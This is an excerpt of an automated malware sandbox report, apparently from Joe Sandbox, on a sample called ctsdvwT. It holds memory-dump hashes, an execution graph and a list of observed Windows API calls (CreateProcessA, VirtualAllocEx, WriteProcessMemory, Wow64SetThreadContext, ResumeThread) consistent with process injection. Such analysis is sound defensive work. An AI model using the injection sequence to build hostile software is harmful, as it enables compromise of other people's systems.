                                • Instruction Fuzzy Hash: C4218178A041018FEF11FBB8E894B7E3765FB85324F148A25D006CB299EF34DC969B91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 638c0b7d3ad796e32e75d21ab67adb0b46c144fd7c34bd0299a79c93243e56f2
                                • Instruction ID: 397e8d16706094af7e4dd1a5416a077aa9ad005672683e8f142ec43fb1ff9567
                                • Opcode Fuzzy Hash: 638c0b7d3ad796e32e75d21ab67adb0b46c144fd7c34bd0299a79c93243e56f2
                                • Instruction Fuzzy Hash: A521D62170D6C04FD303A77C98612993FB5EFC7705B0985EBD094CB29BDB295C06A391
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cedee44b35f4cf74f2ac7319cb1cee432a2630e5d8f770e842564dfa1f3aed75
                                • Instruction ID: 1b0917c42123db8316da03e14a1211a3d92c3aec49281e6d6484ff70183a85ba
                                • Opcode Fuzzy Hash: cedee44b35f4cf74f2ac7319cb1cee432a2630e5d8f770e842564dfa1f3aed75
                                • Instruction Fuzzy Hash: 0E211975A002099FDB54EB74D958B9E77F2EB48710F104568E406EB3A1DB36DD01EBA0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8394631113a6ee6072214b8ee90cb36b6d8f39fcfbebced9671983b1954040b
                                • Instruction ID: 8d84ba4516175c6a90037fde6223d9de18a1688acf7bbb4bf26c31038f331ec8
                                • Opcode Fuzzy Hash: c8394631113a6ee6072214b8ee90cb36b6d8f39fcfbebced9671983b1954040b
                                • Instruction Fuzzy Hash: 32119E30E052044FEF2197B8885037B3765EB92364F34897AD442DF282DE25CD46ABC2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547595791.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f1d000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd2507edd18d7e0abab0ea49335103503336ca157678b50bf9a18155854b0853
                                • Instruction ID: 844c07f3934d54f9d0a1d7758da84089968cf57d5f7b77543775be93853db3c2
                                • Opcode Fuzzy Hash: cd2507edd18d7e0abab0ea49335103503336ca157678b50bf9a18155854b0853
                                • Instruction Fuzzy Hash: CF2192755093C08FCB02CF24D994755BF71EB46314F28C5EAD8498F6A7C33A984ADB62
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2dda5ece559cda5b40aaf6d3c299058fa26192434258b4cd72d28a687416815
                                • Instruction ID: a4aceaee1caa681099d0c75323fd785d313a683b23914cb9010cd5c0dbc0eb27
                                • Opcode Fuzzy Hash: c2dda5ece559cda5b40aaf6d3c299058fa26192434258b4cd72d28a687416815
                                • Instruction Fuzzy Hash: 4B113A30F042089BEF65EBB9C84472B3355EB85364F308969D006DF281DE25CC86ABC2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 227e45a35ce3eb0fbb72ea09574ec66f2e0aeb73241221fd2ef6bdac60effccf
                                • Instruction ID: b54ea2ee71a5872c016dd0d1293e17ba3083a1a1b60382dcccd8eabbe65a79ea
                                • Opcode Fuzzy Hash: 227e45a35ce3eb0fbb72ea09574ec66f2e0aeb73241221fd2ef6bdac60effccf
                                • Instruction Fuzzy Hash: 00113331E012558FCF21EF7898511AEBBF5EF85325B2844B9D806E7202DB35DC42DB91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 052eb832cccb18c06b8e982172b0d017601586fb7a7e2202cc1b097e9e4a8476
                                • Instruction ID: 68e7d5d81ab741fe5678281324e34f7b9dc15acf3a307e5cac9aee3039935f69
                                • Opcode Fuzzy Hash: 052eb832cccb18c06b8e982172b0d017601586fb7a7e2202cc1b097e9e4a8476
                                • Instruction Fuzzy Hash: A411C679F003565FCB10ABB598487AEBFB5FB48750F144565D906D3345EB34CC129790
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd725d7251781e2f3ebbd458f23fd5d8e25d6295ae3455f2d3908526957a9a66
                                • Instruction ID: 321849bbf8f440e8ce5ce526784ede4760bcda150d2bda71ed2c0e56705de4c4
                                • Opcode Fuzzy Hash: cd725d7251781e2f3ebbd458f23fd5d8e25d6295ae3455f2d3908526957a9a66
                                • Instruction Fuzzy Hash: 1B014431E012159BCF21EFB9885119EB7F5FB49364B280479D406E7201EB35DC41DB95
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fb14b59459c53e6ab4b6a54529af28d8418b1c5a19949140cf09cf7a345ca321
                                • Instruction ID: dd391225acf7e891623e4ab1deb36925e529107bb85abb27050394c057af8d4a
                                • Opcode Fuzzy Hash: fb14b59459c53e6ab4b6a54529af28d8418b1c5a19949140cf09cf7a345ca321
                                • Instruction Fuzzy Hash: 1D01B530A00204CBDB00EF95DD4478AB775FF84310F54C164C8085F296DBB5ED45C7A1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8075bfcce49a287bd071eee6852e6537cd947055ce7cbe82b5372f32b657eae
                                • Instruction ID: 6359ce5853590d877bbcb69ff79c1940e37b88c921ef74847b509f9e4f142f7b
                                • Opcode Fuzzy Hash: e8075bfcce49a287bd071eee6852e6537cd947055ce7cbe82b5372f32b657eae
                                • Instruction Fuzzy Hash: 81F0FF31B001149FC314ABB9C4206AE7BA6EFC9314B20847ED40ACB792DF768C41ABE1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7a02bf3163f68dcbdc6b8053f25e60ccf9e278ee495dd5d2828ca727a2ada71
                                • Instruction ID: 127da95c235f3ae14371b4cd3bc0b7ff4261376b1d6eace8acc1b12d548164a3
                                • Opcode Fuzzy Hash: b7a02bf3163f68dcbdc6b8053f25e60ccf9e278ee495dd5d2828ca727a2ada71
                                • Instruction Fuzzy Hash: 1DF08B32D0D2204BCF229A64D8441EE7FF8DF85230F0D8862C441DB081C2718885D6A2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a769b95bcf6d1afd8be453db534cbbda672afcb9695d8af99c050280b7565b61
                                • Instruction ID: 12a2783b89e397d9e651af59baa82e828dcf9ca3444260717d3a21f8057ce23e
                                • Opcode Fuzzy Hash: a769b95bcf6d1afd8be453db534cbbda672afcb9695d8af99c050280b7565b61
                                • Instruction Fuzzy Hash: 90018470904208DFDB01FBE4E8516DCBBB1EF81304F5086A9C4459B295DF315E5AAB92
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f835ced5df0e2806a4042b7de2019a9fac80a2c9b0aa4c571c4c457069a53440
                                • Instruction ID: 033cdf230b683371ea7d8f8997841c3c7c0ce3ad81eef2b0d848988035c9aafa
                                • Opcode Fuzzy Hash: f835ced5df0e2806a4042b7de2019a9fac80a2c9b0aa4c571c4c457069a53440
                                • Instruction Fuzzy Hash: 8FF09033A04150CBDB228FA898911ADFBB1FA9532176D40AAD807DB252DB36DC46EB51
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9728f51a1b853b442f569827ca39927121e1c1583049d2cd47e219bf1bc18019
                                • Instruction ID: d61b6344389d5f0e7d5ea1b40d9c9a1a6f22bf7089100579001fb353f7b1d2fa
                                • Opcode Fuzzy Hash: 9728f51a1b853b442f569827ca39927121e1c1583049d2cd47e219bf1bc18019
                                • Instruction Fuzzy Hash: 6FF04F70900208DFDF01FBE8F95169DBBB5EF80304F508668C0059B294EF31AE56AB91

                                Execution Graph

                                Execution Coverage:10.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:250
                                Total number of Limit Nodes:15
                                execution_graph 20630 131b020 20631 131b062 20630->20631 20632 131b068 GetModuleHandleW 20630->20632 20631->20632 20633 131b095 20632->20633 20634 131d300 DuplicateHandle 20635 131d396 20634->20635 20636 6096ede 20637 6096ee4 20636->20637 20642 6097be2 20637->20642 20660 6097bf0 20637->20660 20678 6097c56 20637->20678 20638 6096eef 20643 6097be4 20642->20643 20654 6097c12 20643->20654 20697 6098129 20643->20697 20702 60981f7 20643->20702 20706 6098890 20643->20706 20711 60986bc 20643->20711 20716 60981bd 20643->20716 20721 60983c6 20643->20721 20725 6098107 20643->20725 20730 6098483 20643->20730 20736 6098123 20643->20736 20741 60984ef 20643->20741 20746 60982cc 20643->20746 20751 60981aa 20643->20751 20760 609802b 20643->20760 20765 60985ab 20643->20765 20769 609884b 20643->20769 20654->20638 20661 6097c0a 20660->20661 20662 6098129 2 API calls 20661->20662 20663 609884b 2 API calls 20661->20663 20664 60985ab 2 API calls 20661->20664 20665 609802b 2 API calls 20661->20665 20666 60981aa 4 API calls 20661->20666 20667 60982cc 2 API calls 20661->20667 20668 60984ef 2 API calls 20661->20668 20669 6098123 2 API calls 20661->20669 20670 6098483 2 API calls 20661->20670 20671 6098107 2 API calls 20661->20671 20672 6097c12 20661->20672 20673 60983c6 2 API calls 20661->20673 20674 60981bd 2 API calls 20661->20674 20675 60986bc 2 API calls 20661->20675 20676 6098890 2 API calls 20661->20676 20677 60981f7 2 API calls 20661->20677 20662->20672 20663->20672 20664->20672 20665->20672 20666->20672 20667->20672 20668->20672 20669->20672 20670->20672 20671->20672 20672->20638 20673->20672 20674->20672 20675->20672 20676->20672 20677->20672 20679 6097be4 20678->20679 20680 6097c59 20678->20680 20681 6098129 2 API calls 20679->20681 20682 609884b 2 API calls 20679->20682 20683 60985ab 2 API calls 20679->20683 20684 609802b 2 API calls 20679->20684 20685 60981aa 4 API calls 20679->20685 20686 60982cc 2 API calls 20679->20686 20687 60984ef 2 API calls 
20679->20687 20688 6098123 2 API calls 20679->20688 20689 6098483 2 API calls 20679->20689 20690 6098107 2 API calls 20679->20690 20691 6097c12 20679->20691 20692 60983c6 2 API calls 20679->20692 20693 60981bd 2 API calls 20679->20693 20694 60986bc 2 API calls 20679->20694 20695 6098890 2 API calls 20679->20695 20696 60981f7 2 API calls 20679->20696 20680->20638 20681->20691 20682->20691 20683->20691 20684->20691 20685->20691 20686->20691 20687->20691 20688->20691 20689->20691 20690->20691 20691->20638 20692->20691 20693->20691 20694->20691 20695->20691 20696->20691 20698 6098152 20697->20698 20774 6095da8 20698->20774 20778 6095da0 20698->20778 20699 6098167 20699->20654 20782 6096368 20702->20782 20786 6096360 20702->20786 20703 6098227 20703->20654 20707 6098896 20706->20707 20708 60988b9 20707->20708 20791 6096518 20707->20791 20795 6096510 20707->20795 20713 60980fd 20711->20713 20712 609810f 20713->20711 20713->20712 20799 6096428 20713->20799 20803 6096421 20713->20803 20718 60980fd 20716->20718 20717 609810f 20718->20717 20719 6096428 WriteProcessMemory 20718->20719 20720 6096421 WriteProcessMemory 20718->20720 20719->20718 20720->20718 20723 6096428 WriteProcessMemory 20721->20723 20724 6096421 WriteProcessMemory 20721->20724 20722 60983f4 20723->20722 20724->20722 20726 60980fd 20725->20726 20727 609810f 20726->20727 20728 6096428 WriteProcessMemory 20726->20728 20729 6096421 WriteProcessMemory 20726->20729 20728->20726 20729->20726 20731 6098152 20730->20731 20732 609851d 20731->20732 20734 6095da8 ResumeThread 20731->20734 20735 6095da0 ResumeThread 20731->20735 20732->20654 20733 6098167 20733->20654 20734->20733 20735->20733 20737 60980fd 20736->20737 20738 609810f 20737->20738 20739 6096428 WriteProcessMemory 20737->20739 20740 6096421 WriteProcessMemory 20737->20740 20739->20737 20740->20737 20742 6098637 20741->20742 20807 6095e58 20742->20807 20811 6095e50 20742->20811 20743 6098652 20747 60982f5 20746->20747 20749 6096518 ReadProcessMemory 

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0131D136
                                • GetCurrentThread.KERNEL32 ref: 0131D173
                                • GetCurrentProcess.KERNEL32 ref: 0131D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0131D209
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: b28bd1dcad2a6ffd7f99d53c8e19bbdaded98f1047d99620dfdcefe6e555394c
                                • Instruction ID: 8d7370d517adaa65dcdaac927dd62a6f0bc7b37ac0d00475c308e5cb1c5990c6
                                • Opcode Fuzzy Hash: b28bd1dcad2a6ffd7f99d53c8e19bbdaded98f1047d99620dfdcefe6e555394c
                                • Instruction Fuzzy Hash: C15169B0900709CFDB48CFAAD588BEEBBF1AF49314F208469E059A73A1D7749944CB65

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0131D136
                                • GetCurrentThread.KERNEL32 ref: 0131D173
                                • GetCurrentProcess.KERNEL32 ref: 0131D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0131D209
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: ac122557e7167c8e804d9fefecad8f3819030964ae20b16516fec7dd302036e4
                                • Instruction ID: fcd36ff913985f8dda2cc01b44e3f60e9932fa9fb0319e28a77a55dd526d7d37
                                • Opcode Fuzzy Hash: ac122557e7167c8e804d9fefecad8f3819030964ae20b16516fec7dd302036e4
                                • Instruction Fuzzy Hash: 295158B0900709CFDB58CFA9D588BDEBBF1BF49314F208469E059A73A0DB749944CB65

                                Control-flow Graph

                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060968E6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 8ece3d3dbae8da75a030de012bc9fb088168f48616606356a6064de616352377
                                • Instruction ID: ac6f5941408a391c3c9dcbfb46c450e3d67ee1a27c4c0a2e220a8db8ad501252
                                • Opcode Fuzzy Hash: 8ece3d3dbae8da75a030de012bc9fb088168f48616606356a6064de616352377
                                • Instruction Fuzzy Hash: 61A16C71D102198FEF54CFA8C840BEEBBF2BF44310F1485A9E859A7240DB759985DFA1

                                Control-flow Graph

                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060968E6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0b2a4940af4c1a023d3b088dfdc12df939029815d21458e623234ae1432f8748
                                • Instruction ID: 0cdad6db2702da57a9c150f64d0ccaf79875b29a22527555ebd64d7338be36d6
                                • Opcode Fuzzy Hash: 0b2a4940af4c1a023d3b088dfdc12df939029815d21458e623234ae1432f8748
                                • Instruction Fuzzy Hash: 9B916C71D102198FEF94DFA8C8407AEBBF2FF44300F048569D859A7240DB759985DFA1

                                Control-flow Graph

                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013159C9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b91aeab1bbcf844adfe9ab6fab7c7dbf8338cf5c75e1018185bcb5987e5722cf
                                • Instruction ID: 962aacb1625fcf85e441f2249339eb52a89c3bad5620e8e71244b12c382357fb
                                • Opcode Fuzzy Hash: b91aeab1bbcf844adfe9ab6fab7c7dbf8338cf5c75e1018185bcb5987e5722cf
                                • Instruction Fuzzy Hash: 1041E371C0071DCBEB24DFAAC884B9EBBB5BF49304F20806AD519AB255DBB16945CF90

                                Control-flow Graph

                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013159C9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: d5bb1e62898807a43519a1d5a6cbf5ee40ebe2c67d455e507e2eb47a9e4ae0cf
                                • Instruction ID: 55045c1650447cb81ad812c9b6d423aa644407aab75fcc1b2523c2206bd153e1
                                • Opcode Fuzzy Hash: d5bb1e62898807a43519a1d5a6cbf5ee40ebe2c67d455e507e2eb47a9e4ae0cf
                                • Instruction Fuzzy Hash: 5B41E371C00719CFEB24CFA9C8847CDBBB5BF49304F24806AD559AB255DB715945CF90

                                Control-flow Graph

                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060963D6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e9af19c6f54fc801f97d3322b6347f558ee26fbc601d4574c43ed5134ee8d8a0
                                • Instruction ID: 3a89f36be82ac279aa97616266e13faf4ff1fe7512e5f17eae6d65f4f050b7d5
                                • Opcode Fuzzy Hash: e9af19c6f54fc801f97d3322b6347f558ee26fbc601d4574c43ed5134ee8d8a0
                                • Instruction Fuzzy Hash: 2C3146719002499FDF10DFA9D844BEEFBF5EF48320F20802AE955AB251C776A940CFA0

                                Control-flow Graph

                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 060964B8
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: a866ec5eacb26a0d2b16c10d1c141ed25b6c39b1e2fd9f8a96ee8e1fc5210aa0
                                • Instruction ID: 15e1f73e701c40d9bbc80b7005b6c9c53acc10614b08f4f21ab5af3065882298
                                • Opcode Fuzzy Hash: a866ec5eacb26a0d2b16c10d1c141ed25b6c39b1e2fd9f8a96ee8e1fc5210aa0
                                • Instruction Fuzzy Hash: 262124B19003499FDF50CFA9C884BEEBBF1FB48310F14842AE959A7241C7799954DBA0

                                Control-flow Graph

                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 060964B8
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 893f5329273c3452dd918d388ce2e5066843d4fb4aaf450049ec61c4b9e84015
                                • Instruction ID: 269c0048fca6f6bd72265aaf43e7f1267e9edc3a6abe08d2d680098177699bc4
                                • Opcode Fuzzy Hash: 893f5329273c3452dd918d388ce2e5066843d4fb4aaf450049ec61c4b9e84015
                                • Instruction Fuzzy Hash: 9E2144B19003099FDF40CFAAC880BEEBBF5FF48310F10842AE958A7241C7799944CBA0

                                Control-flow Graph

                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06096598
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: bcb71a74f382a3424fc06cce50f09c053a20426631a5ee98c07a3b79c6991bcc
                                • Instruction ID: 675bca9f55cba1d01f41a1a27e89210258f618a4ee30f29ca305bbc18e14e71c
                                • Opcode Fuzzy Hash: bcb71a74f382a3424fc06cce50f09c053a20426631a5ee98c07a3b79c6991bcc
                                • Instruction Fuzzy Hash: 442125B18003499FDF10DFAAC880BEEBBF5FF48310F54842AE959A7241C7759940DBA0

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0131D387
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 241922351567d492465e3d6b7395913e8b887c63c6e3fa745bffd54664957820
                                • Instruction ID: c92c7b6dfa251f55bbe3fb634f7385e53775f2ac81a52f2140363238893d1aff
                                • Opcode Fuzzy Hash: 241922351567d492465e3d6b7395913e8b887c63c6e3fa745bffd54664957820
                                • Instruction Fuzzy Hash: 832103B5D00348DFDB10CFAAD884AEEBBF4EB48310F14842AE958A3251C374A954CFA1

                                Control-flow Graph

                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06095ED6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 5104d3d10ef6e69d74aa918f1d133f390d00c8a9c1dc5a446379ae234884a7b0
                                • Instruction ID: 471d14449d906c685636ce829988e4e24068b89fe89a74d489ce737aa01d0e54
                                • Opcode Fuzzy Hash: 5104d3d10ef6e69d74aa918f1d133f390d00c8a9c1dc5a446379ae234884a7b0
                                • Instruction Fuzzy Hash: 80218971D003099FDB50CFAAC8857EEBBF5EF48310F148429D458A7241CB789944CFA0

                                Control-flow Graph

                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06095ED6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: c02c513bbf4176203b7b73d04f9ba201319c315514e88432347932c48197d0dd
                                • Instruction ID: dba4743d7087982b34e64c2e61038883b52176931e3e7691b11de8f409515574
                                • Opcode Fuzzy Hash: c02c513bbf4176203b7b73d04f9ba201319c315514e88432347932c48197d0dd
                                • Instruction Fuzzy Hash: AB214771D003098FDB54DFAAC8857EEBBF5EF48310F54842AD859A7281DBB89944CFA4

                                Control-flow Graph

                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06096598
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0149469a6e05638c2555f66247bb9e19d2a8f95659e6ae90ad5071f0f72835d6
                                • Instruction ID: eacfdbd4710dafbabeff0479ab4f56dff0c2281e5a60d71b8df5dcbf8b41be1d
                                • Opcode Fuzzy Hash: 0149469a6e05638c2555f66247bb9e19d2a8f95659e6ae90ad5071f0f72835d6
                                • Instruction Fuzzy Hash: D32114B18003499FDF10DFAAC880BEEBBF5FF48310F50842AE959A7241C7799940DBA4

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0131D387
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 68191937cf53c89a0d82ad63d46e54b4da2de1a5c6e2c1f260a8ff570a417fcd
                                • Instruction ID: 90deb877c1ca63280960e9486cd832f9b16123d08dc905630ac2ab99fb32f013
                                • Opcode Fuzzy Hash: 68191937cf53c89a0d82ad63d46e54b4da2de1a5c6e2c1f260a8ff570a417fcd
                                • Instruction Fuzzy Hash: A421E2B59003089FDB10CFAAD884ADEBBF9FB48310F14842AE958A3350C374A954CFA0
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0131B101,00000800,00000000,00000000), ref: 0131B312
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
